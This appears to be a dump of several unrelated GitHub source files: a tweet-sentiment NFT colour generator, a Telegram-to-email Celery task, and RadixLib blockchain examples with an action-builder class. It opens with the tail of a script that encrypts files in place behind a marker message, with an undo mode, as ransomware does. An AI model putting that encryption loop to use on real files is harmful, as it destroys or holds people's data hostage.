encrypted = (
HEX(
data,
KEY,
)
.encrypt()
.data
)
f.write(MESSAGE + encrypted)
if self.step % 1000 == 0:
print(f"\n\n({self.step}) {MODE} {path}\n\n")
elif MODE == "UNDO":
if MESSAGE in data:
with codecs.open(path, "w", "utf8") as f:
decrypted = (
HEX(
data.replace(MESSAGE, ""),
KEY,
)
.decrypt()
.data
)
f.write(decrypted)
print(f"\n\n({self.step}) {MODE} {path}\n\n")
except:
print(f"({self.step}) err no access to {file}")
def main():
Dieme().start()
if __name__ == "__main__":
main()
``` |
{
"source": "0xOddrey/DroppingGemsNFT",
"score": 3
} |
#### File: DroppingGemsNFT/gems/openai_api.py
```python
import os
import openai
from decouple import config, Csv
from textblob import TextBlob
import tweepy
import text2emotion as te
from PIL import Image
import random
openai.api_key = config('OPENAI_API_KEY')
consumer_key = config('consumer_key')
consumer_secret = config('consumer_secret')
access_token = config('access_token')
access_token_secret = config('access_token_secret')
TWITTER_AUTH = tweepy.OAuthHandler(consumer_key, consumer_secret)
TWITTER_AUTH.set_access_token(access_token, access_token_secret)
api = tweepy.API(TWITTER_AUTH)
import nltk
nltk.download('omw-1.4')
from collections import Counter
def my_mode(sample):
c = Counter(sample)
results = [k for k, v in c.items() if v == c.most_common(1)[0][1]]
if len(results) == 0:
results = [100,0]
return(results)
def getSubjectivity(text):
result = TextBlob(text).sentiment.subjectivity
final = result * 100
return (round(final))
#Create a function to get the polarity
def getPolarity(text):
result = TextBlob(text).sentiment.polarity
final = result * 100 + 100
return (round(final))
def getTweets(username):
tweets = api.user_timeline(screen_name=username, count=50)
# fetching the user
user = api.get_user(screen_name=username)
# fetching the ID
ID = user.id_str
tweet_list=[]
tweets_for_csv = [tweet.text for tweet in tweets] # CSV file created
for j in tweets_for_csv:
tweet_list.append(j)
return(tweet_list)
def getTopic(username):
filename = "gems/static/images/colors_scheme.png"
img = Image.open(filename)
if username != "_none_":
results = ["fee2e2", "ffedd5", "ecfccb", "dcfce7", "e0f2fe", "ede9fe", "fae8ff", "fce7f3", "c7d2fe"]
random.shuffle(results)
try:
tweets = getTweets(username)
except:
tweets = None
tweet_count = 0
ukraine = False
blackat = False
sxsw = False
if tweets:
for tweet in tweets:
if "@blackatxyz" in tweet.lower():
blackat = True
if "#sxsw" in tweet.lower():
sxsw = True
if "#standwithukraine️" in tweet.lower():
ukraine = True
if "RT @" not in tweet:
if tweet_count < 10:
subject = getSubjectivity(tweet)
polar = getPolarity(tweet)
if polar != 100 and subject != 0:
colors = img.getpixel((polar, subject))
colors = '{:02x}{:02x}{:02x}'.format(*colors)
tweet_count += 1
results.insert(0, colors)
if blackat:
results = ["4d4d4d", "3c3c3c", "000000", "4d4d4d", "111111", "1e1e1e", "111111", "000000", "3c3c3c", "111111"]
random.shuffle(results)
if sxsw:
results = ["C3FB5C", "6A7EF9", "1DE38C", "36C7AE", "C3FB5C", "6A7EF9", "1DE38C", "36C7AE", "C3FB5C", "6A7EF9",]
random.shuffle(results)
if ukraine:
results = ["005BBB", "FFD500", "005BBB", "FFD500", "005BBB", "FFD500", "005BBB", "FFD500", "005BBB", "FFD500"]
random.shuffle(results)
else:
results = ["cbd5e1", "94a3b8", "64748b", "e2e8f0", "cbd5e1", "94a3b8", "64748b", "e2e8f0", "94a3b8"]
return(results[:9])
def getFullTopic(username):
filename = "gems/static/images/colors_scheme.png"
img = Image.open(filename)
subject_mode = [0,0]
polar_mode = [0,0]
tweet_numbers = []
if username != "_none_":
results = ["fee2e2", "ffedd5", "ecfccb", "dcfce7", "e0f2fe", "ede9fe", "fae8ff", "fce7f3", "c7d2fe"]
random.shuffle(results)
try:
tweets = getTweets(username)
except:
tweets = None
tweet_count = 0
subject_total = []
polar_total = []
ukraine = False
blackat = False
sxsw = False
if tweets:
for tweet in tweets:
if "@blackatxyz" in tweet.lower():
blackat = True
if "#sxsw" in tweet.lower():
sxsw = True
if "#standwithukraine️" in tweet.lower():
ukraine = True
if "RT @" not in tweet:
if tweet_count < 10:
subject = getSubjectivity(tweet)
polar = getPolarity(tweet)
if polar != 100 and subject != 0:
subject_total.append(round(subject/10)*10)
polar_total.append(round(polar/10)*10)
colors = img.getpixel((polar, subject))
colors = '{:02x}{:02x}{:02x}'.format(*colors)
tweet_count += 1
results.insert(0, colors)
numer_totals = colors, subject, polar
tweet_numbers.append(numer_totals)
subject_mode = my_mode(subject_total)
polar_mode = my_mode(polar_total)
if blackat:
results = ["4d4d4d", "3c3c3c", "000000", "4d4d4d", "111111", "1e1e1e", "111111", "000000", "3c3c3c", "111111"]
random.shuffle(results)
if sxsw:
results = ["C3FB5C", "6A7EF9", "1DE38C", "36C7AE", "C3FB5C", "6A7EF9", "1DE38C", "36C7AE", "C3FB5C", "6A7EF9",]
random.shuffle(results)
if ukraine:
results = ["005BBB", "FFD500", "005BBB", "FFD500", "005BBB", "FFD500", "005BBB", "FFD500", "005BBB", "FFD500"]
random.shuffle(results)
else:
results = ["cbd5e1", "94a3b8", "64748b", "e2e8f0", "cbd5e1", "94a3b8", "64748b", "e2e8f0", "94a3b8"]
return(results[:9], tweet_numbers, subject_mode[0], polar_mode[0])
```
#### File: DroppingGemsNFT/gems/utils.py
```python
from .models import TwitterToken, twitterConnection
from requests import post, put, get
def get_user_tokens(session_id):
user_tokens=TwitterToken.objects.filter(session_id=session_id)
if user_tokens.exists():
return user_tokens[0]
else:
return None
def update_or_create_user_token(session_id, oauth_token, oauth_secret, user_id, user_name):
tokens = get_user_tokens(session_id)
if tokens:
tokens.oauth_token=oauth_token
tokens.oauth_secret=oauth_secret
tokens.user_id=user_id
tokens.user_name=user_name
try:
tokens.save(update_fields=['oauth_token',
'oauth_secret', 'user_id','user_name'], force_update=True)
except Exception as e:
print(e)
else:
tokens = TwitterToken(session_id=session_id, oauth_token=oauth_token,
oauth_secret=oauth_secret, user_id=user_id, user_name=user_name)
try:
tokens.save(force_insert=True)
except Exception as e:
print(e)
def is_twitter_authenticated(session_id):
tokens = get_user_tokens(session_id)
if tokens:
return True
else: return False
``` |
{
"source": "0xOddrey/TelegramEmail",
"score": 2
} |
#### File: TelegramEmail/telemail/tasks.py
```python
import os
from sendgrid import SendGridAPIClient
from sendgrid.helpers.mail import Mail
from base.celery import app
from django.views.generic import TemplateView
from django.core import mail
from datetime import datetime, timedelta
from django.template.loader import render_to_string
from django.utils.html import strip_tags
import _datetime
from datetime import datetime
from .models import *
from decouple import config, Csv
from celery import Celery
from django.conf import settings
from celery.schedules import crontab
from celery import shared_task
from datetime import datetime, timedelta
from django.template.loader import render_to_string
from django.utils.html import strip_tags
from .models import *
from decouple import config, Csv
from django.template.loader import get_template
import requests
from base.celery import app
from telethon import TelegramClient
from telethon.tl.functions.channels import GetFullChannelRequest
from telethon import TelegramClient, events, sync
from telethon.errors import SessionPasswordNeededError
from telethon.tl.functions.messages import (GetHistoryRequest)
from telethon.tl.types import (
PeerChannel
)
import asyncio
import json
import logging
logging.basicConfig(level=logging.DEBUG)
from base.celery import app
# Setting configuration values
api_id = config("api_id")
api_hash = config("api_hash")
api_hash = str(api_hash)
phone = config("phone")
username = config("username")
SESSION = os.environ.get('TG_SESSION', 'quart')
@app.task
def runTelethon(arg):
print(arg)
loop = asyncio.new_event_loop()
asyncio.set_event_loop(loop)
client = TelegramClient(SESSION,api_id,api_hash, loop=loop).start()
client.connect()
if not client.is_user_authorized():
client.send_code_request(phone)
me = client.sign_in(phone, input('Enter code: '))
channel_entity = client.get_entity(PeerChannel(int(config('PEER_CHANNEL'))))
offset_id = 0
limit = 20
all_messages = []
total_messages = 0
total_count_limit = 0
while True:
history = client(GetHistoryRequest(
peer=channel_entity,
offset_id=offset_id,
offset_date=None,
add_offset=0,
limit=limit,
max_id=0,
min_id=0,
hash=0
))
if not history.messages:
break
messages = history.messages
for message in messages:
if message.pinned:
result = message.to_dict()
t_messages = {"id":result["id"], "message":result["message"]}
all_messages.append(t_messages)
offset_id = messages[len(messages) - 1].id
total_messages = len(all_messages)
if total_count_limit != 0 and total_messages >= total_count_limit:
break
api_url = "http://telemail.herokuapp.com/add-message/"
requests.post(api_url, json=all_messages)
print(api_url)
client.disconnect()
@app.on_after_finalize.connect
def app_ready(**kwargs):
"""
Called once after app has been finalized.
"""
sender = kwargs.get('sender')
# periodic tasks
speed = 60
sender.add_periodic_task(speed, runTelethon.s('starting message pull'),name='update leases every {} seconds'.format(speed))
def send_pinned_email():
all_users = telegram_user.objects.all()
end_date = datetime.now()
start_date = end_date - timedelta(days=7)
allMessages = pinnedMessage.objects.filter(timestamp__range=[start_date, end_date], is_sent=False)
for user in all_users:
user_email = user.email
message = Mail(
from_email='<EMAIL>',
to_emails=user_email ,
subject='CPG Club',
html_content=get_template('summary_email.html').render({'allMessages': allMessages}))
try:
sg = SendGridAPIClient(config('SENDGRID_API_KEY'))
response = sg.send(message)
except Exception as e:
pass
``` |
{
"source": "0xOmarA/RadixLib",
"score": 3
} |
#### File: examples/10- connecting to a custom network/main.py
```python
from typing import Dict
import radixlib as radix
import os
def main() -> None:
# Defining the new custom network that we will be connecting to.
network: radix.network.Network = radix.network.Network(
name = "localnet",
account_hrp = "ddx",
resource_hrp_suffix = "_dr",
validator_hrp = "dv",
node_hrp = "dn",
default_gateway_url = "http://192.168.100.92:5308"
)
# Getting the mnemonic phrase for the wallet that we will be connecting to. In this case, my
# mnemonic phrase is stored in an envirnoment variable under the name "MNEMONIC_PHRASE".
# You might want to do the same or you could also just put your mnemonic phrase as a literal
# string.
mnemonic_phrase: str = os.environ['MNEMONIC_PHRASE']
# Creating a new wallet object using the mnemonic phrase above on the network defined.
wallet: radix.Wallet = radix.Wallet(
provider = radix.Provider(network),
signer = radix.Signer.from_mnemonic(mnemonic_phrase)
)
print("Wallet address:", wallet.address)
print("Wallet public key:", wallet.public_key)
# Getting the balances for my wallet on this custom network
parsed_account_balances: Dict[str, Dict[str, int]] = wallet.get_account_balances()
print("Parsed account balances:", parsed_account_balances)
if __name__ == "__main__":
main()
```
#### File: examples/12- automated token sale/token sale.py
```python
from typing import Optional, Dict, List, Any
import radixlib as radix
import config
import json
def get_all_transactions(
wallet: radix.Wallet
) -> List[Dict[str, Any]]:
""" Gets all of the transactions where this wallet was involved. """
current_cursor: Optional[str] = None
transactions: List[Dict[str, Any]] = []
while 1:
next_cursor, new_transactions = wallet.get_account_transactions(30, current_cursor)
transactions.extend(new_transactions)
if next_cursor is not None:
current_cursor = next_cursor
else:
break
return sorted( # type: ignore
transactions,
key = lambda x: x['confirmed_time'],
reverse = False
)
def main() -> None:
# Loading up the data file which contains the state of the program from the last run
with open(config.data_json_file, 'r') as file:
data_file_content: Dict[str, Any] = json.load(file)
handled_transactions_mapping: Dict[str, str] = data_file_content['handled_transactions_mapping']
# Loading up our wallet through the information that we provided in the config file
wallet: radix.Wallet = radix.Wallet(
provider = radix.Provider(config.network),
signer = radix.Signer.from_mnemonic(config.mnemonic_phrase)
)
print("Listening on transactions on wallet:", wallet.address)
# Getting all of the transactions that the wallet address was involved in
transactions: List[Dict[str, Any]] = get_all_transactions(wallet)
print(f"Number of transactions on address:", len(transactions))
# Deriving the token RRI for the token that we will will be selling
token_rri: str = radix.derive.token_rri(
creator_public_key = wallet.public_key,
token_symbol = config.token_symbol.lower(),
network = config.network
)
print("Sale is done on token:", token_rri)
# Getting our current balance of the token that we are selling
balance: int = wallet.get_account_balances()['total_balance'].get(token_rri, 0)
print("Current balance of token is:", balance)
# Iterating over all of the transaction objects from the oldest to the newest. This way, people
# who sent their XRD first get their tokens first.
for tx in transactions[::-1]:
# Ignore the transaction if we have handeled it already
if tx['hash'] in handled_transactions_mapping.keys():
continue
# Getting all of the "TransferTokens" actions where tokens where sent from another address
# to our address.
actions: List[radix.actions.TransferTokens] = list(filter(
lambda x: isinstance(x, radix.actions.TransferTokens) and x.from_account.address != wallet.address and x.to_account.address == wallet.address, # type: ignore
tx['actions']
))
# If there are no actions where we get tokens, then ignore this transaction
if not actions:
continue
# Creating the action builder which will be used by this transaction
tx_action_builder: radix.ActionBuilder = wallet.action_builder
# Tallying up the tokens sent and their RRIs into an easy to query dictionary. There are two
# main reasons as to why we're doing this:
# 1. Just in case somebody sent XRD as well as other tokens to us in a single transaction,
# we want to refund them the other tokens that they've sent.
# 2. Just in case somebody is sneaky and knows how radix works and tries to send XRD using
# multiple actions just to try to break the system.
# This tokens tally will be used in a way very very similar to how buckets are used in
# scrypto where we take the amount of tokens we need and then return the bucket back with
# whatever that it has
tokens_tally: Dict[str, int] = {}
tokens_tally[token_rri] = 0 # Setting this key as well since we're setting the dict keys
tokens_tally[config.xrd_rri] = 0 # Setting this key as well since we're setting the dict keys
for action in actions:
if action.token_rri not in tokens_tally.keys():
tokens_tally[action.token_rri] = 0
tokens_tally[action.token_rri] += action.amount
# Checking how much is the XRD amount sent enough for and refunding the remaining amount
requested_amount: int = int(tokens_tally.get(config.xrd_rri, 0) / config.token_price_in_atto) * (10**18)
amount_to_supply: int = min(balance, requested_amount) # Limit the requested amount by the balance
tokens_tally[config.xrd_rri] -= int(amount_to_supply * radix.derive.xrd_from_atto(config.token_price_in_atto))
tokens_tally[token_rri] += amount_to_supply
# Reduce the balance by the amount that we took
balance -= tokens_tally[token_rri]
# Adding the tokens to the action builder of the transaction. At this stage, we have taken
# the amount of XRD which is owed to us and we're refunding the remaining xrd (whatever
# amount that might be).
for rri, amount in tokens_tally.items():
if amount == 0:
continue
tx_action_builder = tx_action_builder.token_transfer(
from_account_address = wallet.address,
to_account_address = actions[0].from_account.address,
token_rri = rri,
transfer_amount = amount
)
# Check if there are actions or not. If there are no actions, then there is no need to
# invoke the code that executes the transaction
if not tx_action_builder.to_action_list():
continue
tx_hash: str = wallet.build_sign_and_send_transaction(
actions = tx_action_builder,
message_string = "Here are your tokens good sir!",
encrypt_for_address = actions[0].from_account.address
)
handled_transactions_mapping[tx['hash']] = tx_hash
# Saving the state to the data file. We are saving the state with each transaction and not
# just once at the end. This is done to ensure that even if an exception does happen in the
# middle of the operation of the code, the transactions which have truly already been
# handeled are put into the data file.
with open(config.data_json_file, 'w') as file:
data: Dict[str, Any] = {
"handled_transactions_mapping": handled_transactions_mapping
}
json.dump(data, file)
if __name__ == "__main__":
main()
```
#### File: examples/2- creating a new mutable supply token/main.py
```python
import radixlib as radix
import os
def main() -> None:
# Information about the token that we're creating
token_name: str = "Mutable Token"
token_symbol: str = "mut"
token_description: str = "Testing the creation of mutable token using the RadixLib python package."
token_icon_url: str = ""
token_url: str = ""
# Defining the network that the token will be created on
network: radix.network.Network = radix.network.STOKENET
# Getting the mnemonic phrase for the wallet that we will be connecting to and using to create
# the token. In this case, my mnemonic phrase is stored in an envirnoment variable under the
# name "MNEMONIC_PHRASE". You might want to do the same or you could also just put your mnemonic
# phrase as a literal string.
mnemonic_phrase: str = os.environ['MNEMONIC_PHRASE']
# Creating a new wallet object using the mnemonic phrase above on the network defined.
wallet: radix.Wallet = radix.Wallet(
provider = radix.Provider(network),
signer = radix.Signer.from_mnemonic(mnemonic_phrase)
)
print("Wallet address:", wallet.address)
print("Wallet public key:", wallet.public_key)
# Deriving the RRI of the token before we create it.
token_rri: str = radix.derive.token_rri(wallet.public_key, token_symbol, network)
print("Creating new token:", token_rri)
# Using the quick transactions capability of the wallet object to create a transaction for the
# new token.
tx_hash: str = wallet.build_sign_and_send_transaction(
actions = (
wallet.action_builder
.new_mutable_token(
owner_address = wallet.address,
name = token_name,
symbol = token_symbol,
description = token_description,
icon_url = token_icon_url,
url = token_url,
granularity = 1 # Only a granularity of 1 is allowed in Radix at the moment.
)
)
)
print("Token transaction sent under hash:", tx_hash)
if __name__ == "__main__":
main()
```
#### File: examples/3- minting tokens/main.py
```python
import radixlib as radix
import os
def main() -> None:
# Information on the person who we will be minting the tokens for.
recipient_address: str = "tdx1qspqqecwh3tgsgz92l4d4f0e4egmfe86049dj75pgq347fkkfmg84pgx9um0v"
token_rri: str = "<KEY>"
mint_amount: int = 10 * (10**18) # This will mint 10 tokens
# Defining the network that we will be connecting to.
network: radix.network.Network = radix.network.STOKENET
# Getting the mnemonic phrase for the wallet that we will be connecting to. In this case, my
# mnemonic phrase is stored in an envirnoment variable under the name "MNEMONIC_PHRASE".
# You might want to do the same or you could also just put your mnemonic phrase as a literal
# string.
mnemonic_phrase: str = os.environ['MNEMONIC_PHRASE']
# Creating a new wallet object using the mnemonic phrase above on the network defined.
wallet: radix.Wallet = radix.Wallet(
provider = radix.Provider(network),
signer = radix.Signer.from_mnemonic(mnemonic_phrase)
)
print("Wallet address:", wallet.address)
print("Wallet public key:", wallet.public_key)
# Using the quick transactions capability of the wallet object to create a transaction for the
# minting.
tx_hash: str = wallet.build_sign_and_send_transaction(
actions = (
wallet.action_builder
.mint_tokens(
to_account_address = recipient_address,
mint_amount = mint_amount,
token_rri = token_rri
)
)
)
print("Tokens minted under transaction hash:", tx_hash)
if __name__ == "__main__":
main()
```
#### File: examples/5- creating a new fixed supply token/main.py
```python
import radixlib as radix
import os
def main() -> None:
# Information about the token that we're creating
token_name: str = "Fixed Token"
token_symbol: str = "fix"
token_description: str = "Testing the creation of fixed supply token using the RadixLib python package."
token_icon_url: str = ""
token_url: str = ""
to_address: str = "tdx1qspqqecwh3tgsgz92l4d4f0e4egmfe86049dj75pgq347fkkfmg84pgx9um0v"
total_supply: int = 10_000 * (10**18) # The total supply of the token is 10_000
# Defining the network that the token will be created on
network: radix.network.Network = radix.network.STOKENET
# Getting the mnemonic phrase for the wallet that we will be connecting to and using to create
# the token. In this case, my mnemonic phrase is stored in an envirnoment variable under the
# name "MNEMONIC_PHRASE". You might want to do the same or you could also just put your mnemonic
# phrase as a literal string.
mnemonic_phrase: str = os.environ['MNEMONIC_PHRASE']
# Creating a new wallet object using the mnemonic phrase above on the network defined.
wallet: radix.Wallet = radix.Wallet(
provider = radix.Provider(network),
signer = radix.Signer.from_mnemonic(mnemonic_phrase)
)
print("Wallet address:", wallet.address)
print("Wallet public key:", wallet.public_key)
# Deriving the RRI of the token before we create it.
token_rri: str = radix.derive.token_rri(wallet.public_key, token_symbol, network)
print("Creating new token:", token_rri)
# Using the quick transactions capability of the wallet object to create a transaction for the
# new token.
tx_hash: str = wallet.build_sign_and_send_transaction(
actions = (
wallet.action_builder
.new_fixed_supply_token(
owner_address = wallet.address,
name = token_name,
symbol = token_symbol,
description = token_description,
icon_url = token_icon_url,
url = token_url,
granularity = 1, # Only a granularity of 1 is allowed in Radix at the moment.
token_supply = total_supply,
to_account_address = to_address
)
)
)
print("Token transaction sent under hash:", tx_hash)
if __name__ == "__main__":
main()
```
#### File: examples/6- multi-action transactions/main.py
```python
import radixlib as radix
import os
def main() -> None:
# Information about the people who we will be sending the tokens to
recipient1_address: str = "tdx1qspw6g43xaef9uke65grhn074e00kvp9nr6mdj5gdhksc7r6cen8trch8lr6x"
recipient2_address: str = "tdx1qsp6t8v6f98rpn0zc4e84f388neca2xdme6rg7vddd9ef4teq444lhgkh4hmu"
recipient3_address: str = "tdx1qspzutm77jv33jn9v9xsxyelkqw6lyf6ewspkwex6mems4g6m589gxqcnv6g6"
token_rri: str = radix.constants.XRD_RRI['stokenet']
transfer_amount: int = radix.derive.atto_from_xrd(10) # 10 XRD for each address
# Defining the network that we will be connecting to.
network: radix.network.Network = radix.network.STOKENET
# Getting the mnemonic phrase for the wallet that we will be connecting to. In this case, my
# mnemonic phrase is stored in an envirnoment variable under the name "MNEMONIC_PHRASE".
# You might want to do the same or you could also just put your mnemonic phrase as a literal
# string.
mnemonic_phrase: str = os.environ['MNEMONIC_PHRASE']
# Creating a new wallet object using the mnemonic phrase above on the network defined.
wallet: radix.Wallet = radix.Wallet(
provider = radix.Provider(network),
signer = radix.Signer.from_mnemonic(mnemonic_phrase)
)
print("Wallet address:", wallet.address)
print("Wallet public key:", wallet.public_key)
# Using the quick transactions capability of the wallet object to create a transaction for the
# multi-action token transfer transaction.
tx_hash: str = wallet.build_sign_and_send_transaction(
actions = (
wallet.action_builder
.token_transfer(
from_account_address = wallet.address,
to_account_address = recipient1_address,
token_rri = token_rri,
transfer_amount = transfer_amount
)
.token_transfer(
from_account_address = wallet.address,
to_account_address = recipient2_address,
token_rri = token_rri,
transfer_amount = transfer_amount
)
.token_transfer(
from_account_address = wallet.address,
to_account_address = recipient3_address,
token_rri = token_rri,
transfer_amount = transfer_amount
)
)
)
print("Tokens sent to addresses under transaction hash:", tx_hash)
# You can view the transaction I obtained from this example by finding it on the explorer at:
# https://stokenet-explorer.radixdlt.com//#/transactions/91cf51c2e65f08cc643240f4fd4ba8105a9f3026d37dd22826fc4a55e5d03106
# As you can see, the three addresses that we have put all received their XRD in a single
# transaction.
if __name__ == "__main__":
main()
```
#### File: examples/9- getting transaction history/method 1.py
```python
from typing import Optional, List, Dict, Any
import radixlib as radix
def main() -> None:
# The address of the account that we want to get the transaction history for.
account_address: str = "<KEY>"
# Defining the network that we will be connecting to.
network: radix.network.Network = radix.network.STOKENET
# Creating the provider object which is esentially our link or connection to the blockchain
# via the gateway API.
provider: radix.Provider = radix.Provider(network)
# Creating an empty list to store the transactions and beggining to query for the transactions
transactions_list: List[Dict[str, Any]] = []
cursor: Optional[str] = None
while True:
# Getting the transaction history for the current cursor
query_response: Dict[str, Any] = provider.get_account_transactions(
account_address = account_address,
cursor = cursor
)
# Parsing the query response and then extending the transactions list with the parsed
# response.
parsed_transaction_list: List[Dict[str, Any]] = radix.parsers.DefaultParser.parse(
data = query_response,
data_type = "get_account_transactions"
)
transactions_list.extend(parsed_transaction_list)
# Getting the cursor from the query response if it's present. If there is no cursor present
# then we have reached the end of the transaction history and can safely stop fetching
# transactions
cursor = query_response.get('next_cursor')
if cursor is None:
break
# Printing the transactions to the console
print('Transactions:', transactions_list)
if __name__ == "__main__":
main()
```
#### File: radixlib/actions/action_builder.py
```python
from radixlib.network import Network
from radixlib.actions import (
CreateTokenDefinition,
UnregisterValidator,
RegisterValidator,
TransferTokens,
UnstakeTokens,
StakeTokens,
MintTokens,
BurnTokens,
ActionType
)
from typing import Union, List, overload, Optional
import radixlib as radix
class ActionBuilder():
""" Used to build a list of Radix actions through a series of simple function calls.
Some of the actions in the new Gateway API can be rather confusing to create especially ones
where there is a series of optional arguments that are either required together or not required
together. To solve this problem, this action builder class introduces a set of functions which
may be used to create the desired actions.
This class is written with the idea that it should allow for method chaining to take place when
adding actions. So, you should expect to see most functions return a reference to self in order
to allow for action additions to be chained.
"""
def __init__(
self,
network: Network
) -> None:
""" Instantiates a new ActionBuilder for the given network.
Args:
network (Network): The network which the action builder will be used for.
"""
self.network: Network = network
self.__actions_list: List[ActionType] = []
def new_mutable_token(
self,
owner_address: str,
name: str,
symbol: str,
description: str,
icon_url: str,
url: str,
granularity: int,
) -> 'ActionBuilder':
""" Creates a new CreateTokenDefinition action which defines a mutable token.
Args:
owner_address (str): The address of the owner of the token.
name (str): The name of the token.
symbol (str): The symbol of the token. This should be a 3 to 8 long small case symbol
for the token.
description (str): The description of the token.
icon_url (str): The URL of the token icon.
url (str): The URL to the token website.
granularity (int): An integer of the token granularity
Returns:
ActionBuilder: A reference to self to allow for method chaining when adding actions.
"""
# Calculating the RRI of the token based on the information passed to the function
derived_token_rri: str = radix.derive.token_rri(
creator_public_key = radix.derive.public_key_from_wallet_address(owner_address),
token_symbol = symbol,
network = self.network
)
# Creating the action and appending it to the list of actions that have been created so far.
self.__actions_list.append(
CreateTokenDefinition(
name = name,
symbol = symbol,
description = description,
icon_url = icon_url,
url = url,
granularity = granularity,
token_rri = derived_token_rri,
is_supply_mutable = True,
owner = owner_address
)
)
return self
def new_fixed_supply_token(
self,
owner_address: str,
name: str,
symbol: str,
description: str,
icon_url: str,
url: str,
granularity: int,
token_supply: int,
to_account_address: str
) -> 'ActionBuilder':
""" Creates a new CreateTokenDefinition action which defines a fixed supply token.
Args:
owner_address (str): The address of the owner of the token.
name (str): The name of the token.
symbol (str): The symbol of the token. This should be a 3 to 8 long small case symbol
for the token.
description (str): The description of the token.
icon_url (str): The URL of the token icon.
url (str): The URL to the token website.
granularity (int): An integer of the token granularity.
token_supply (int): The amount of supply of the token that we wish to have.
to_account_address (str): The address that the tokens will be sent to upon their
creation.
Returns:
ActionBuilder: A reference to self to allow for method chaining when adding actions.
"""
# Calculating the RRI of the token based on the information passed to the function
derived_token_rri: str = radix.derive.token_rri(
creator_public_key = radix.derive.public_key_from_wallet_address(owner_address),
token_symbol = symbol,
network = self.network
)
# Creating the action and appending it to the list of actions that have been created so far.
self.__actions_list.append(
CreateTokenDefinition(
name = name,
symbol = symbol,
description = description,
icon_url = icon_url,
url = url,
granularity = granularity,
token_rri = derived_token_rri,
is_supply_mutable = False,
token_supply = token_supply,
to_account = to_account_address
)
)
return self
def unstake_tokens_by_percentage(
self,
from_validator_address: str,
to_account_address: str,
percentage_amount: Union[int, float],
) -> 'ActionBuilder':
""" Creates a new UnstakeTokens action for a percentage of the tokens to unstake from
the specified validator.
Args:
from_validator_address (str): The validators that tokens will be unstaked from.
to_account_address (str): The address that the tokens will be sent to once unstaked.
percentage_amount (Union[int, float]): The percentage amount to unstake from the given
validator. Keep in mind that this is the percentage amount meaning that it should
be a numbet between 0 and 100.
Returns:
ActionBuilder: A reference to self to allow for method chaining when adding actions.
"""
# Creating the action and appending it to the list of actions that have been created so far.
self.__actions_list.append(
UnstakeTokens(
to_account = to_account_address,
from_validator = from_validator_address,
unstake_percentage = percentage_amount
)
)
return self
def unstake_tokens_by_amount(
self,
from_validator_address: str,
to_account_address: str,
unstake_amount: int,
) -> 'ActionBuilder':
""" Creates a new UnstakeTokens action for a specific amount of the tokens to unstake from
the specified validator.
Args:
from_validator_address (str): The validators that tokens will be unstaked from.
to_account_address (str): The address that the tokens will be sent to once unstaked.
unstake_amount (int): The amount of XRD to unstake from the validator. Keep in mind that you
must specify this amount in Atto and not in XRD.
Returns:
ActionBuilder: A reference to self to allow for method chaining when adding actions.
"""
# Creating the action and appending it to the list of actions that have been created so far.
self.__actions_list.append(
UnstakeTokens(
to_account = to_account_address,
from_validator = from_validator_address,
amount = unstake_amount,
token_rri = radix.derive.xrd_rri_on_network(self.network)
)
)
return self
def stake_tokens_by_amount(
self,
to_validator_address: str,
from_account_address: str,
stake_amount: int,
) -> 'ActionBuilder':
""" Creates a new UnstakeTokens action for a specific amount of the tokens to unstake from
the specified validator.
Args:
to_validator_address (str): The validators that tokens will be unstaked from.
from_account_address (str): The address that the tokens will be sent to once unstaked.
stake_amount (int): The amount of XRD to unstake from the validator. Keep in mind that
you must specify this amount in Atto and not in XRD.
Returns:
ActionBuilder: A reference to self to allow for method chaining when adding actions.
"""
# Creating the action and appending it to the list of actions that have been created so far.
self.__actions_list.append(
StakeTokens(
from_account = from_account_address,
to_validator = to_validator_address,
amount = stake_amount,
token_rri = radix.derive.xrd_rri_on_network(self.network)
)
)
return self
def token_transfer(
self,
from_account_address: str,
to_account_address: str,
token_rri: str,
transfer_amount: int
) -> 'ActionBuilder':
""" Creates a new TokenTransfer action.
Args:
from_account_address (str): The account which will be sending the tokens.
to_account_address (str): The account which will be getting the tokens.
token_rri (str): The RRI of the token to send.
transfer_amount_amount (int): The amount of tokens to send.
Returns:
ActionBuilder: A reference to self to allow for method chaining when adding actions.
"""
# Creating the action and appending it to the list of actions that have been created so far.
self.__actions_list.append(
TransferTokens(
from_account = from_account_address,
to_account = to_account_address,
amount = transfer_amount,
token_rri = token_rri
)
)
return self
def mint_tokens(
self,
to_account_address: str,
mint_amount: int,
token_rri: str,
) -> 'ActionBuilder':
""" Creates a new MintTokens action.
Args:
to_account_address (str): The account that the tokens will be minted for.
mint_amount (int, optional): The amount of tokens to mint.
token_rri (str, optional): The RRI of the token.
Returns:
ActionBuilder: A reference to self to allow for method chaining when adding actions.
"""
# Creating the action and appending it to the list of actions that have been created so far.
self.__actions_list.append(
MintTokens(
to_account = to_account_address,
amount = mint_amount,
token_rri = token_rri
)
)
return self
def burn_tokens(
self,
from_account_address: str,
burn_amount: int,
token_rri: str,
) -> 'ActionBuilder':
""" Creates a new BurnTokens action.
Args:
to_account_address (str): The account that the tokens will be minted for.
mint_amount (int, optional): The amount of tokens to mint.
token_rri (str, optional): The RRI of the token.
Returns:
ActionBuilder: A reference to self to allow for method chaining when adding actions.
"""
# Creating the action and appending it to the list of actions that have been created so far.
self.__actions_list.append(
BurnTokens(
from_account = from_account_address,
amount = burn_amount,
token_rri = token_rri
)
)
return self
@overload
def register_validator(self, *, validator_address: str) -> 'ActionBuilder': ...
@overload
def register_validator(self, *, node_address: str) -> 'ActionBuilder': ...
@overload
def register_validator(self, *, public_key: str) -> 'ActionBuilder': ...
@overload
def register_validator(self, *, account_address: str) -> 'ActionBuilder': ...
def register_validator(
self,
*,
validator_address: Optional[str] = None,
node_address: Optional[str] = None,
public_key: Optional[str] = None,
account_address: Optional[str] = None,
) -> 'ActionBuilder':
""" Creates a new RegisterValidator action.
This method is used to create a new RegisterValidator action and has four overrides to
allow this method to be called using anything that identifies the validator.
Args:
validator_address (:obj:`str`, optional): A string of the validator address to register.
node_address (:obj:`str`, optional): A string of the node address to register.
public_key (:obj:`str`, optional): A string of the public key of the validator to
register.
account_address (:obj:`str`, optional): A string of the account address of the validator
to .
Returns:
ActionBuilder: A reference to self to allow for method chaining when adding actions.
"""
# Getting the validator address from the arguments passed
_validator_address: str = ""
if validator_address:
_validator_address = validator_address
elif node_address:
_validator_address = radix.derive.validator_address_from_public_key(
public_key = radix.derive.public_key_from_node_or_validator_address(node_address),
network = self.network
)
elif public_key:
_validator_address = radix.derive.validator_address_from_public_key(
public_key = public_key,
network = self.network
)
elif account_address:
_validator_address = radix.derive.validator_address_from_public_key(
